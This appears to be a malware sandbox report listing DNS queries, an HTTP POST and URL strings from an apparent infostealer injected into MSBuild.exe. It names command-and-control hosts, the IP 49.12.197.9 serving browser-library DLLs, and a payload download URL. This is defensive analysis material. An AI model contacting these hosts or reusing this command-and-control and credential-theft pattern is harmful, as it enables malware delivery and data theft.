Source: global traffic	DNS traffic detected: DNS query: abnomalrkmu.site
Source: global traffic	DNS traffic detected: DNS query: chorusarorp.site
Source: global traffic	DNS traffic detected: DNS query: treatynreit.site
Source: global traffic	DNS traffic detected: DNS query: snarlypagowo.site
Source: global traffic	DNS traffic detected: DNS query: mysterisop.site
Source: global traffic	DNS traffic detected: DNS query: absorptioniw.site
Source: global traffic	DNS traffic detected: DNS query: advocachark.store
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Http://cowod.hopto.org/form-data;
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.IDAAECKJDAK
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.IDAAECVWXYZ1234567890isposition:
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.CAEBAK
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgDAAEC--tent-Disposition:
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgDAAEContent-Disposition:
Source: file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoAAKJDAK
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoGCAEBAK
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exe
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeJ
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exej
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeorm-data;
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2201341180.000000001FE5D000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://49.12.197.9
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9//w
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/freebl3.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/l
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/mozglue.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/msvcp140.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/msvcp140.dll5
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dllrsg47
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/softokn3.dll
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/sqlp.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dllU
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9ECAAFH
Source: HCAEHD.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/1$~
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/Ri
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/api
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/api;
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/api;$~(9
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/bixd4
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store:443/api
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: HCAEHD.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HCAEHD.4.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HCAEHD.4.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.co
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
